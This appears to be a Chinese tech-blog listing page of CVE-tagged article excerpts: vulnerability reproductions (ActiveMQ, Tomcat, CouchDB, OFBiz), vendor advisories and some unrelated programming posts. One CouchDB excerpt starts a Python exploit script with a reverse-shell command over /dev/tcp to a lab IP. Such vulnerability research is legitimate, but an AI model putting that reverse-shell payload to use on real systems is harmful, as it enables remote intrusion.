CVE 第13页

【漏洞复现】ActiveMQ文件上传漏洞(CVE-2016-3088)

Nx01产品简介ApacheActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务，是面向消息中间件（MOM）的最终实现，它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。Nx02漏洞描述ApacheActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。Jetty是一个开源的servlet容器，它为基于Java的web容器，

晚风不及你ღ·2024-01-05 16:06

【漏洞复现】ActiveMQ反序列化漏洞(CVE-2015-5254)

Nx01产品简介ApacheActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务，是面向消息中间件（MOM）的最终实现，它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。Nx02漏洞描述RedHatJBossApplicationServer是一款基于JavaEE的开源应用服务器。JBossAS4.x及之前版本中，JbossMQ实现过程的

晚风不及你ღ·2024-01-05 16:06

Weblogic安全漫谈（四）

CVE-2020-14756二次反序列化具有对抗检查逻辑的天生丽质，在CVE-2018-2893中就有利用字节数组和反射重建类两种方式。

杭州默安科技·2024-01-05 16:40

taocms 代码注入（CVE-2022-25578）

名称：taocms代码注入（CVE-2022-25578）描述：taoCMS是基于php+sqlite/mysql的国内最小（100Kb左右）的功能完善的CMS管理系统.体积小（仅180Kb）速度快，包含文件管理

凯凯_0523·2024-01-05 12:36

Apache HTTPD 换行解析漏洞（CVE-2017-15715）详解

ApacheHTTPD换行解析漏洞（CVE-2017-15715）1.cd到CVE-2017-15715cdvulhub/httpd/CVE-2017-157152.运行docker-composebuilddocker-composebuild3

爱喝水的泡泡·2024-01-05 11:24

SemCms外贸网站商城系统 SQL注入漏洞复现(CVE-2023-50563)

0x01产品简介SemCms是国内团队打造的专门针对外贸网站的开源CMS，主要用于外贸企业，兼容IE，Firefox等主流浏览器。建设商城性质的外贸网站，多语言（小语种）网站。0x02漏洞概述SemCms外贸网站商城系统SEMCMS_Function.php中的AID参数存在SQL注入漏洞，未经身份认证的攻击者可通过此漏洞获取数据库权限，深入利用可获取服务器权限0x03影响范围SEMCMSv4.8

OidBoy_G·2024-01-05 09:35

Weblogic安全漫谈(一)

本篇从CVE-2015-4852入手了解T3协议的构造，作为后续T3反序列化漏洞学习和利

杭州默安科技·2024-01-05 07:12

进程管理常见系统调用

3.1创建（fork）3.2直面fork3.3execve系统调用3.4exit系统调用4.处理器调度4.1中断以后选择哪个进程在处理器上执行？

风雨夕·2024-01-05 02:30

SSH协议中发现新安全漏洞CVE-2023-48795

该漏洞名为TerrapinAttack，编号为（CVE-2023-48795，CVSS评分：5.9），该漏洞被描述为“有史以来第一个实际可利用的前缀截断攻击”。

极道Jdon·2024-01-04 20:26

[C#]C#利用Emgu.CV4.8.0实现条码检测识别

github.com/emgucv/emgucv【算法介绍】调用Emgu.CV4.8.0自带BarcodeDetector的接口进行调用【效果展示】【实现部分代码】usingEmgu.CV;usingEmgu.CV.CvEnum

FL1623863129·2024-01-04 17:23

NeurIPS 2023 | 像GPT-4一样可以看图聊天！LLaVA：大型语言和视觉助手

点击下方卡片，关注“CVer”公众号AI/CV重磅干货，第一时间送达点击进入—>【多模态和Transformer】交流群在CVer微信公众号后台回复：LLaVA，可以下载本论文pdf、代码和数据集，学起来

Amusi（CVer）·2024-01-04 12:12

Unity相机查看预览旋转模型

usingSystem.Collections.Generic;usingUnityEngine;publicclassCameraTargetMove:MonoBehaviour{publicTransformtarget;publicVector3pivotOffset

那个村的李富贵·2024-01-04 12:55

Apache Tomcat(CVE-2019-0232)远程代码执行漏洞复现

0x00简介Tomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。对于一个初学者来说，可以这样认为，当在一台机器上配置好Apache服务器，可利用它响应HTML（标准通用标记语言下的一个应用）页面的访问请求。实际上Tomcat是Apache服务器的扩展，但运行时它是独立运行的，所以当你运

5f4120c4213b·2024-01-04 09:24

当心这30个重要漏洞！微软发布12月补丁日安全通告

分别是CVE-2023-20588AMDSpeculativeLeaks、CVE

亚信安全官方账号·2024-01-04 08:25

Atlassian Confluence 模板注入代码执行漏洞风险通告

近期，亚信安全CERT通过监控发现，Atlassian公司发布了一则安全公告，针对Confluence数据中心和Confluence服务器存在的远程代码执行漏洞（CVE-2023-22522）进行了修复

亚信安全官方账号·2024-01-04 08:24

Apache Struts 代码执行漏洞风险通告

最近，亚信安全CERT通过监控发现，Apache官方披露了ApacheStruts代码执行漏洞（CVE-2023-50164）。

亚信安全官方账号·2024-01-04 08:24

高危！Apache OFBiz未授权远程代码执行漏洞风险通告

近日，亚信安全CERT监控到ApacheOFBiz发布更新公告，修复了ApacheOFBiz中的一个未授权远程代码执行(CVE-2023-49070)。

亚信安全官方账号·2024-01-04 08:54

Weblogic安全漫谈(二)

前言继本系列上篇从CVE-2015-4852入手了解T3协议的构造后，本篇继续分析开启T3反序列化魔盒后的修复与绕过。

杭州默安科技·2024-01-04 08:25

破壳漏洞(CVE-2014-6271)综合分析

目录一、威胁卡片二、概述三、已知事件发布/披露情况四、漏洞的影响范围五、漏洞原理六、漏洞验证方法七、漏洞检测方法八、漏洞可能会带来的影响九、针对此漏洞的建议十、写在最后的啰嗦的话一、威胁卡片二、概述2014年9月24日Bash被公布存在远程代码执行漏洞，安天实验室安全研究与应急处理中心(以下简称：安天CERT)第一时间根据信息研判，确认该漏洞可以产生严重的后果，且分布广泛，于北京时间9月24日早晨

lsyou_2000·2024-01-04 07:28

【漏洞复现】系列集合

该篇文章仅供学习网络安全技术参考研究使用，请勿使用相关技术做违法操作ApacheApache_HTTPD_未知后缀名解析Apache_HTTPD_换行解析(CVE-2017-15715)Apache_HTTPD

过期的秋刀鱼-·2024-01-04 05:48

【漏洞复现】Memcached 未授权访问

Memcached未授权访问漏洞说明内容漏洞编号CVE-2013-7239漏洞名称Memcached未授权访问漏洞评级影响范围Memcached全版本漏洞描述修复方案见底部；1.1、漏洞描述Memcached

过期的秋刀鱼-·2024-01-04 05:18

【网络安全常用术语解读】CVSS详解

如何给一个CVE漏洞进行评分？读完本文你将收获所有答案。如还有其他相关疑问，欢迎留言讨论。

筑梦之月·2024-01-03 19:06

C语言实现堆结构及堆排序

//要想实现堆排序首先需要实现一个大根(小根)堆#include#include#includeusingnamespacestd;staticvectorvec;staticvoidmyswap(inti

lpl312905509·2024-01-03 07:35

linux修复SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

参考文章升级openssl版本来修复漏洞。make和makeinstall过程中可能会报错，要记得处理。可能提示没有权限创建目录或文件所有命令最好加上sudo，

BugGavin_Qin·2024-01-03 06:52

VMware vcenter/ESXI系列漏洞总结

文章目录前言漏洞一、VMwareESXI远程代码执行漏洞(CVE-2020-3992)漏洞二、VMwareESXI身份验证和拒绝服务漏洞1、VMwareESXiSFCB身份验证绕过漏洞(CVE-2021

李火火安全阁·2024-01-03 01:45

【漏洞复现】CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞

文章目录声明前言一、漏洞简介二、影响范围三、环境搭建四、漏洞复现五、修复方法六、参考链接声明仅供安全研究和技术学习，切勿用于非法用途，切记！前言Laravel是一套简洁、优雅的PHPWeb开发框架(PHPWebFramework)，旨在实现的Web软件的MVC架构，它可以让开发者从面条一样杂乱的代码中解脱出来，帮助构建一个完美的网络APP，而且每行代码都可以简洁、富于表达力。在Laravel中已经

李火火安全阁·2024-01-03 01:15

【漏洞复现】OpenSSH ProxyCommand命令注入漏洞（CVE-2023-51385）

文章目录前言一、漏洞背景二、漏洞详情三、影响范围四、漏洞验证前言OpenSSH存在命令注入漏洞（CVE-2023-51385），攻击者可利用该漏洞注入恶意Shell字符导致命令注入。

李火火安全阁·2024-01-03 01:45

相机围绕某个点自由视角

publicclassFreedomCamera:MonoBehaviour{privateboolisDown=false;publicfloatspeed=0.6f;publicfloatdistance=10;publicVector3centerPo

蛋蛋的忧桑·2024-01-02 21:03

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

一、漏洞描述ApacheCouchDB是一个开源数据库，专注于易用性和成为”完全拥抱web的数据库”。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，CreditSuisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。在2017年11月15日，

黄公子学安全·2024-01-02 10:51

Couchdb 任意命令执行漏洞(CVE-2017-12636)

一、环境搭建二、访问三、构造payload#!/usr/bin/envpython3importrequestsimportjsonimportbase64fromrequests.authimportHTTPBasicAuthtarget='http://192.168.217.128:5984'#目标ipcommand=rb"""sh-i>&/dev/tcp/192.168.217.128/5

黄公子学安全·2024-01-02 10:51

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

漏洞原理AdobeColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusionMarkupLanguage）是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控，攻击者可以构造属性值，使未授权的用户读取服务器任意文件获得敏感信息，甚至可以进行远程代码执行漏洞的利用。AdobeColdFusion8、9版本中皆存在一处目录

黄公子学安全·2024-01-02 10:18

《VulnHub》DC：1

2024-01-0112:46:50categories:WriteUp：Cyber-Rangeexcerpt:主机发现、目标信息扫描、漏洞扫描、网站指纹信息识别、网站目录扫描、drupalCMS漏洞利用（CVE2014

永别了，赛艾斯滴恩·2024-01-02 05:10

cnPuTTY CAC 0.80—PuTTY CAC 0.80中文版本简单说明~~

PuTTYCAC0.80同步更新了针对Terrapin攻击(CVE-2023-48795)的修改，除了这些还进行了额外的添加和修改。另外来自cnPuTTYCAC自身也进行了小的修改。

zdIdealism·2024-01-02 03:36

【复现】Apache OFBiz RCE漏洞(CVE-2023-51467)_03

目录一.概述二.漏洞影响三.漏洞复现1.漏洞一四.修复建议五.搜索语法六.免责声明一.概述ApacheOFBiz不仅是一个产品及订单管理系统，它还提供了一整套功能，涵盖企业所需的方方面面。除了管理产品及其相关内容(如电子商店)外，ApacheOFBiz还能履行许多其它重要角色，包括客户关系管理、项目进度、计费管理、人力资源管理以及订单管理。二.漏洞影响通过提交恶意构造的参数破坏命令语句结构，从而达

穿着白衣·2024-01-01 22:05

Weblogic-CVE-2023-21839

由此可见：CVE-2023-21839是一个weblogic的JNDI注入漏洞。

Guess'·2024-01-01 21:38

CVE-2021-40280

CVE-2021-40280站长招商网内容管理系统简称ZZCMS，由ZZCMS团队开发，融入数据库优化，内容缓存，AJAX等技术，使网站的安全性、稳定性、负载能力得到可靠保障。

Hxdih·2024-01-01 18:37

CVE-2022-21661漏洞复现

CVE-2022-21661漏洞复现运行环境:春秋运镜该漏洞是wordpress5.8.3以下存在sql注入/wp-admin/admin-ajax.php处存在sql注入漏洞复现一开始根据网上使用的payload

Hxdih·2024-01-01 18:07

CVE-2018-2893：Oracle WebLogic Server 远程代码执行漏洞分析预警

0x00漏洞描述 7月18日，Oracle官方发布了季度补丁更新，其中修复了一个OracleWebLogicServer远程代码执行漏洞CVE-2018-2893，此漏洞是对编号为CVE-2018-2628

道书简·2024-01-01 15:04

[CISCN 2019华东南]Web11

Smarty模板注入可以参考博客：Smarty模板注入&CVE-2017-1000480左上角既然能提取我的IP，那么根据页面内容稍微猜一下，应该是从XFF头提取IP，假设没有设置XFF头

妙尽璇机·2024-01-01 06:57

苹果紧急修复两大零日漏洞，影响iPhone、iPad 和 Mac 设备

CVE-2023-42916和CVE-2023-42917这两个漏洞是在WebKit浏览器引擎中发现的，这两个漏洞允许攻击者通过越界读取弱点

威胁情报收集站·2024-01-01 06:24

Apache OFBiz RCE漏洞复现（CVE-2023-51467）

0x01产品简介ApacheOFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。0x02漏洞概述漏洞成因该系统的身份验证机制存在缺陷，可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外，在处理特定数据输入时，攻击者可构造恶意请求绕过身份认证，利用后台相关接口功能执行groovy代码，导致远程代码执行漏洞影响未授权访问和潜在

OidBoy_G·2024-01-01 06:08

原理图中VDD、VCC、VSS、VEE、GND区别

问题引入：在电路中我们会经常看到VDDVCCVEEGND那么我们接下来一起探究他们的含义吧！

@daiwei·2023-12-31 19:57

几个查找开源组件CVE的网站和工具

有时在使用一个开源组件之前，需要先调查一下这个组件是否有一些比较验证的CVE。同时，对于一些重要的正在使用的组件，例如：SpringFramework，也希望查询一下是否有严重的CVE。

jimmyleeee·2023-12-31 12:42

【Web】vulhub-httpd apache解析漏洞复现(1)

目录①CVE-2017-15715②apache_parsing_vulnerability①CVE-2017-15715贴出源码：Uploadfile:filename:意思就是上传文件的后缀不能是php

Z3r4y·2023-12-31 10:46

Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088一、环境搭建Java:jdk8影响版本ApacheActiveMQ<5.13.0二、用docker搭建漏洞环境访问一下web界面然后进入admin目录登录账号:admin密码:

黄公子学安全·2023-12-31 06:54

ImportError: /lib64/libm.so.6: version `GLIBC_2.23‘ not found问题解决方法

1.环境：Centos7，GCCversion9.1.0，python3.7，TensorFlow1.14.0.因为/usr/lib64/libstdc++.so.6:version`CXXABI_1.3.8

rongDang·2023-12-31 05:11

Unity简单的敌人巡逻方法（NavMeshAgent）

privateNavMeshAgenteagent;//定义一个寻路privateAnimatoranimator;//声明一个动画publicVector3[]point;//巡逻范围和位置数量privateintindex

靖观其变·2023-12-30 16:08

Unity 4.6.3：金属渲染支持和针对iOS的IL2CPP更新

Youcangetitonourdownloadpage.Withthisrelease,we’rebringingiOSMetalrenderingsupporttoUnity4.x.Unity4.6.3isthefirstUnity4.xpublicversionsupportingbothcriticalf

culiao6493·2023-12-30 14:31

开发知识点-Weblogic

Weblogic介绍CVE_2018_2628poc-yaml-weblogic-ssrfpoc-yaml-weblogic-cve-2017-10271poc-yaml-weblogic-cve-2019

amingMM·2023-12-30 14:59

CVE-2023-39785堆栈溢出漏洞分析

漏洞严重性评分（CVSS）：未提供指定的CNA（CVE编号分配机构）：MITRE公司日期记录创建：2023年08月07日参考链接：Tenda官方网站/GitHub上的相关信息0x01漏洞影响影响版本：TendaAC8V4V16.03.34.060x0

INSBUG·2023-12-30 13:27

推荐频道

CVE